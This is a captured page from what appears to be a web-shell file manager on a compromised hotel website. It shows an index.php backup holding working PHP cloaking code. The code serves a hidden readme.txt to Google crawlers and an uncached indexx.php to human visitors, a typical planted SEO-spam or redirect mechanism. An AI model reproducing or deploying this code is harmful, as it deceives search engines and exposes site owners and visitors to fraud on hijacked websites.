File manager - Edit - G:/PleskVhosts/cwh030.com/kingsinnlenoircitytn.com/index.php.bak-20260515-151457
Back
<?php function is_google_bot() { $agents = array( "Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News" ); if (!isset($_SERVER['HTTP_USER_AGENT'])) return false; foreach ($agents as $agent) { if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) { return true; } } return false; } if (is_google_bot()) { $bot_content = file_get_contents('readme.txt'); echo $bot_content; exit; } else { header("Expires: Tue, 01 Jan 2000 00:00:00 GMT"); header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); include('indexx.php'); exit; } ?>
| ver. 1.4 |
Github
|
.
| PHP 5.4.45 | Generation time: 0.12 |
proxy
|
phpinfo
|
Settings